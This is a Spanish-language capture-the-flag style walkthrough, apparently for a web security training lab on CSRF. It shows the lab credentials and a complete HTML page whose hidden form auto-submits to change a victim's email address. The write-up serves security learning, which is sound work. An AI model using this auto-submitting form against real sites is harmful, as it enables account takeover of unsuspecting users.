Cross-site request forgery (CSRF)
Enunciado
Este laboratorio tiene una función para cambiar el correo electrónico que es vulnerable a ataques CSRF.
Para resolverlo, crea un código HTML que haga un ataque CSRF para cambiar la dirección de correo del usuario que vea la página. Después, súbelo a tu servidor de explotación.
Puedes iniciar sesión en tu propia cuenta con estas credenciales:
Usuario: wiener
Contraseña: peter
Resolución
Nos logueamos. Interceptamos la petición de cambiar el email para mandarla al Repeater.

Es el único parámetro que se envía. Vamos al exploit server y ahí creamos la plantilla HTML maliciosa.
<html>
<body>
<form action='https://0a4100b10448eae680482b6e00b50061.web-security-academy.net/my-account/change-email' method='POST'>
<input name="email" value="hola@beafn28.com" type="hidden"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Lo mandamos a la víctima y completamos el laboratorio.

Last updated
Was this helpful?